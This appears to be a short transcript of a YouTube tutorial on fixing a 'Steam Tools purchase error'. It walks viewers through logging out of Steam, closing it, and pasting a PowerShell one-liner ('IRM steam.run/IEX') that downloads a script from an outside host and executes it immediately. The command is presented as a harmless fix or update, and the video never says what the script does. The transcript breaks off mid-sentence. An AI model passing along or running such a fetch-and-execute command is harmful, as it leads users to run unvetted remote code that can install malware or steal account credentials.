Hi guys, welcome back to our YouTube channel. In this video, I will show you how to fix Steam Tools purchase error message. Now, this will be a simple fix, but first and foremost, you need to make sure that you're logged out of your Steam account. You can see over here, I've logged out. Then after logging out, go ahead and close Steam on your PC. Okay? After closing Steam on your PC, come over here on the start and search for PowerShell. Once you search for PowerShell, go ahead and paste this over here. It is IRM steam.run/IEX. Okay, go ahead and paste it. If you want, you can note it down. Then after that, click on enter. Once you click on enter, you can go ahead and close up this PowerShell and the update will run on Steam Tools. After doing that, guys, you'll have fixed that problem. Alright, so thanks for watching, guys. We shall meet